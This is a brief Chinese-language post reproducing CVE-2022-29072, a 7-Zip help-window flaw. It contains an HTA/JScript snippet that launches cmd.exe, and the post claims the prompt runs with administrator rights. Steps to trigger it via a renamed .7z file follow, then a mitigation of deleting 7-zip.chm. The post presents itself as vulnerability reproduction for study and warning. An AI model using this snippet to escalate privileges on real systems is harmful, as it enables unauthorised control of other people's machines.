CVE-2022-29072(7z漏洞复现及对应措施)
首先,找个txt文本,将以下代码输入:
<html>
<head>
<HTA:APPLICATION ID="7zipcodeexec">
<script language="jscript">
var c = "cmd.exe";
new ActiveXObject('WScript.Shell').Run(c);
</script>
<head>
<html>
然后将文件的后缀名改为7z:
然后,打开7zFM.exe,点击右上角的帮助,将上述的7z拖入到帮助的右边框中:
此时,便会弹出对应的cmd窗口,具有管理员权限:
应对方法,将7-zip.chm删除即可:
7-zip.chm:该文本文件实际上就是7z的帮助页面。。。。
(以上行为,仅供学习测试使用,并未做出任何违法行为,希望以此漏洞提醒各位使用7z的朋友尽快进行对应的防范)